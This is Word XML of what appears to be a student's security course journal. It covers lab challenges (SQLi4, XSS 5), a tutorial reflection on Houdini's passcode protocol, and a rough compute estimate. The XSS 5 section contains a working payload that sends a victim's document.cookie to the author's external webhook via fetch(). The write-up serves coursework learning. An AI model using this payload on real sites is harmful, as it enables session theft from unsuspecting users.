              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">However from research around NSA sites currently the estimated compute power is approximately 2 exaflops </w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">with at least 2 of these type of super computing facilities: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>as assuming they are</w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve"> only need on floating point operation for each decision/key calculation [Large Bit Width Processing :O]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440F11A5" w14:textId="66550993" w:rsidR="00A90EF5" w:rsidRPr="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00A90EF5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>2×</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18</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>×24×3600≈3.456×</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096B6636" w14:textId="41C2D541" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423"/>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23">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44C759A3" w:rsidR="42E83AC9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>SQLi4</w:t>
            </w:r>
            <w:r w:rsidR="00C54874">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1466365F" w14:textId="3B68287C" w:rsidR="00C54874" w:rsidRDefault="00C54874" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="3F4D0AB4" w14:textId="68BAA646" w:rsidR="003F1846" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Initially I tried to break the sql by breaking the user input here to prove that I can take control and used a sleep and this caused the gateway to fail rather than an exception being pulled so that helped me figure out the open door</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBD33D2" w14:textId="501DA3E9" w:rsidR="003F1846" w:rsidRPr="00C54874" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="003F1846">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
                  <wp:extent cx="4683318" cy="1676688"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="45927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4888" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4696926" cy="1681560"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="12BBF377" w14:textId="3ED0AE2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="003F1846" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="003F1846">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                  <wp:extent cx="5498327" cy="2753275"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
                  <wp:docPr id="69401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140" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5501315" cy="2754771"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="06110A1E" w14:textId="78DB4C54" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="609BBD08" w14:textId="4E6701A4" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="236E0C9D" w14:textId="589427DD" w:rsidR="42E83AC9" w:rsidRPr="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 5:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22115BF1" w14:textId="53C70D99" w:rsidR="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="00AE14A7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I could find that the error page in the URL take HTML injection and by first trying to bold it and put an image in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7663F7" w14:textId="00AEBCF6" w:rsidR="00C27111" w:rsidRDefault="00AE14A7" w:rsidP="00F5572B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270D4AD0" w14:textId="6F7189C7" w:rsidR="00F5572B" w:rsidRDefault="00F5572B" w:rsidP="00F5572B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I then decided to enter this url with a javascript forwarding session to a webhook I have to then retrieve the cookie from the server:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653C4F89" w14:textId="77777777" w:rsidR="00031E5F" w:rsidRDefault="00031E5F" w:rsidP="00031E5F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6512FF4B" w14:textId="0BDAB502" w:rsidR="00AE14A7" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="00AE14A7">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00AE14A7" w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="730E688E">
                  <wp:extent cx="4801815" cy="3290323"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="3155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1931" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4810926" cy="3296566"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3805EF94" w14:textId="0703E670" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="00F5572B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
                  <wp:extent cx="5943600" cy="1924050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="139102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9199" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1924050"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3345DD74" w14:textId="2A037EBB" w:rsidR="42E83AC9" w:rsidRPr="00E838A9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 6:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFB98AE" w14:textId="2F7D9B2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36149FC0" w14:textId="263CC0F7" w:rsidR="42E83AC9" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="0A97515C" w14:textId="77777777" w:rsidR="005251A5" w:rsidRDefault="005251A5" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="568D4859" w14:textId="77777777" w:rsidR="005251A5" w:rsidRPr="00ED5F6D" w:rsidRDefault="005251A5"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28">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6B8F23CD" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0">
            <w:pPr>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>During the tutorial, we considered how Houdini’s protocol could better verify a medium claiming to communicate with him after death.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D1BA4E" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>We first discussed the risk of entrusting the passcode to Bess, since her personal connection made her vulnerable to social engineering. I agreed the secret should move to another mechanism, as any single person becomes a weak target that many mediums could pressure or exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6442FB06" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To reduce this risk, we proposed using a dynamic key generated for each test. This would make the code harder to break, especially if time was included to add entropy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D58599" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>One suggestion was to use the date and time as inputs to a Fibonacci-based algorithm that changes the spoken phrase. While stronger than a fixed passcode, it still depends on Bess knowing the method. If she revealed it, or if enough mediums tested patterns over time, the code could still be approximated, creating Type 2 error risks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63696B8A" w14:textId="77777777" w:rsidR="003032B0" w:rsidRPr="001D05E8" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To counter false attempts, I proposed raising the cost of guessing by removing Bess and placing the medium in a puzzle or trap only Houdini could solve. This would discourage brute force attempts, but it risks a Type 1 error by harming a truthful medium and could still be defeated if the trap were tampered with. This showed me that both error types cannot be fully eliminated.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FFAC6EC" w14:textId="329EFF78" w:rsidR="001D05E8" w:rsidRDefault="00790B88" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve">Another alternative method proposed was to use the digits of </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:kern w:val="2"/>
                  <w:lang w:eastAsia="en-AU"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
                <m:t>π</m:t>
              </m:r>
            </m:oMath>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve"> to hash the cipher text in such a way, since currently the digits of </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:kern w:val="2"/>
                  <w:lang w:eastAsia="en-AU"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
                <m:t>π</m:t>
              </m:r>
            </m:oMath>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve"> are pseudorandom and hence will </w:t>
            </w:r>
            <w:r w:rsidR="005661E4">
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t>significantly increase the entropy of the encryption system making it even harder to attempt to crack.</w:t>
            </w:r>
          </w:p>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lastRenderedPageBreak/>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p w14:paraId="41FAE89A" w14:textId="77777777" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52"/>
    <w:p w14:paraId="2D011BB3" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="2482ECA3" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="651FD94B" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="70F02334" w14:textId="31327A35" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
      <w:r w:rsidRPr="001D4E4C">
        <w:t>[1] Institute of Telecommunications, University of Stuttgart, “Channel Coding Web Demonstration,” University of Stuttgart. [Online]. Available: https://webdemo.inue.uni-stuttgart.de/webdemos/03_theses/chCoding/index.php?id=1. [Accessed: Jun. 22, 2026].</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4E4C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001D4E4C">
        <w:br/>
        <w:t>[2] Rahsoft, “Understanding Quadrature Amplitude Modulation (QAM) and Its Applications,” Feb. 28, 2025. [Online]. Available: https://rahsoft.com/2025/02/28/understanding-quadrature-amplitude-modulation-qam-and-its-applications/. [Accessed: Jun. 22, 2026].</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001D4E4C">
      <w:headerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId3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6-20T11:12:00Z" w:initials="TG">
    <w:p w14:paraId="1A27AC78" w14:textId="77777777" w:rsidR="005A08DC" w:rsidRDefault="005A08DC" w:rsidP="005A08DC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Note from solo teenager hacker to large botnet they have forgotten the seconds per hour calculation and so a factor of 3600 needs to be used to recalculate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27AC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A03D0A" w16cex:dateUtc="2026-06-20T0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27AC78" w16cid:durableId="5FA03D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F1D20" w14:textId="77777777" w:rsidR="00001743" w:rsidRPr="00ED5F6D" w:rsidRDefault="00001743">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="201159CD" w14:textId="77777777" w:rsidR="00001743" w:rsidRPr="00ED5F6D" w:rsidRDefault="00001743">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E49BA" w14:textId="77777777" w:rsidR="00001743" w:rsidRPr="00ED5F6D" w:rsidRDefault="00001743">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="377DFD00" w14:textId="77777777" w:rsidR="00001743" w:rsidRPr="00ED5F6D" w:rsidRDefault="00001743">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303D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDD24D2E"/>
    <w:lvl w:ilvl="0" w:tplc="DC32290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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2FFB5C29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3E0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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D566498"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7CE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F87F36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AE2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0B3BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E27918"/>
    <w:lvl w:ilvl="0" w:tplc="8092D73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abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A6A7E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032E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76364">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="548495595">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2077703631">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1117984316">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129320367">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="755437397">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1805536101">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1094784343">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="7910244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01743"/>
    <w:rsid w:val="0002725D"/>
    <w:rsid w:val="00031E5F"/>
    <w:rsid w:val="000439B8"/>
    <w:rsid w:val="00061133"/>
    <w:rsid w:val="000B00DE"/>
    <w:rsid w:val="00105939"/>
    <w:rsid w:val="00163D99"/>
    <w:rsid w:val="0018464D"/>
    <w:rsid w:val="001D05E8"/>
    <w:rsid w:val="001D4E4C"/>
    <w:rsid w:val="001F6C67"/>
    <w:rsid w:val="00214FA8"/>
    <w:rsid w:val="00244F69"/>
    <w:rsid w:val="002963B1"/>
    <w:rsid w:val="002A2112"/>
    <w:rsid w:val="002D1807"/>
    <w:rsid w:val="002F080E"/>
    <w:rsid w:val="00302EA8"/>
    <w:rsid w:val="003032B0"/>
    <w:rsid w:val="003123C6"/>
    <w:rsid w:val="0031712A"/>
    <w:rsid w:val="003317F4"/>
    <w:rsid w:val="003362CA"/>
    <w:rsid w:val="00353511"/>
    <w:rsid w:val="003567E5"/>
    <w:rsid w:val="0038476D"/>
    <w:rsid w:val="003A1FD7"/>
    <w:rsid w:val="003A4F61"/>
    <w:rsid w:val="003A7BCC"/>
    <w:rsid w:val="003F1846"/>
    <w:rsid w:val="00433997"/>
    <w:rsid w:val="004458A6"/>
    <w:rsid w:val="00450A42"/>
    <w:rsid w:val="00473801"/>
    <w:rsid w:val="00487CBB"/>
    <w:rsid w:val="004C66A1"/>
    <w:rsid w:val="004D16C5"/>
    <w:rsid w:val="00511DF2"/>
    <w:rsid w:val="005251A5"/>
    <w:rsid w:val="00553FBC"/>
    <w:rsid w:val="005617B7"/>
    <w:rsid w:val="00561E9D"/>
    <w:rsid w:val="005656F6"/>
    <w:rsid w:val="005661E4"/>
    <w:rsid w:val="0058592F"/>
    <w:rsid w:val="005A08DC"/>
    <w:rsid w:val="005A1FC7"/>
    <w:rsid w:val="005B73AE"/>
    <w:rsid w:val="005E24F1"/>
    <w:rsid w:val="006157CB"/>
    <w:rsid w:val="006576AD"/>
    <w:rsid w:val="006665A1"/>
    <w:rsid w:val="00717063"/>
    <w:rsid w:val="0076778C"/>
    <w:rsid w:val="00790B88"/>
    <w:rsid w:val="007B4CBA"/>
    <w:rsid w:val="007C100A"/>
    <w:rsid w:val="007E5820"/>
    <w:rsid w:val="00812199"/>
    <w:rsid w:val="00831FB7"/>
    <w:rsid w:val="008825CF"/>
    <w:rsid w:val="008976B6"/>
    <w:rsid w:val="008A5A2F"/>
    <w:rsid w:val="008A7E74"/>
    <w:rsid w:val="008B59EF"/>
    <w:rsid w:val="00901E67"/>
    <w:rsid w:val="00903D82"/>
    <w:rsid w:val="0098788C"/>
    <w:rsid w:val="009D10E4"/>
    <w:rsid w:val="009D5A48"/>
    <w:rsid w:val="00A1213F"/>
    <w:rsid w:val="00A13563"/>
    <w:rsid w:val="00A3718C"/>
    <w:rsid w:val="00A5771B"/>
    <w:rsid w:val="00A843F5"/>
    <w:rsid w:val="00A90EF5"/>
    <w:rsid w:val="00AB26CD"/>
    <w:rsid w:val="00AC1CEF"/>
    <w:rsid w:val="00AE14A7"/>
    <w:rsid w:val="00AF1C36"/>
    <w:rsid w:val="00B51443"/>
    <w:rsid w:val="00B55423"/>
    <w:rsid w:val="00B9480E"/>
    <w:rsid w:val="00B9509C"/>
    <w:rsid w:val="00BE4F31"/>
    <w:rsid w:val="00C068A8"/>
    <w:rsid w:val="00C27111"/>
    <w:rsid w:val="00C536AF"/>
    <w:rsid w:val="00C54874"/>
    <w:rsid w:val="00CA4D29"/>
    <w:rsid w:val="00D44FAA"/>
    <w:rsid w:val="00D83FA9"/>
    <w:rsid w:val="00DE490B"/>
    <w:rsid w:val="00E003A3"/>
    <w:rsid w:val="00E05570"/>
    <w:rsid w:val="00E11AEA"/>
    <w:rsid w:val="00E36FBA"/>
    <w:rsid w:val="00E45EA2"/>
    <w:rsid w:val="00E56622"/>
    <w:rsid w:val="00E838A9"/>
    <w:rsid w:val="00E91064"/>
    <w:rsid w:val="00E9362C"/>
    <w:rsid w:val="00EB538C"/>
    <w:rsid w:val="00ED5F6D"/>
    <w:rsid w:val="00EF26E3"/>
    <w:rsid w:val="00F042BF"/>
    <w:rsid w:val="00F12C98"/>
    <w:rsid w:val="00F1361F"/>
    <w:rsid w:val="00F33663"/>
    <w:rsid w:val="00F34953"/>
    <w:rsid w:val="00F46C7D"/>
    <w:rsid w:val="00F5572B"/>
    <w:rsid w:val="00F94604"/>
    <w:rsid w:val="00FA08D1"/>
    <w:rsid w:val="00FA64B7"/>
    <w:rsid w:val="00FB0A49"/>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 w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
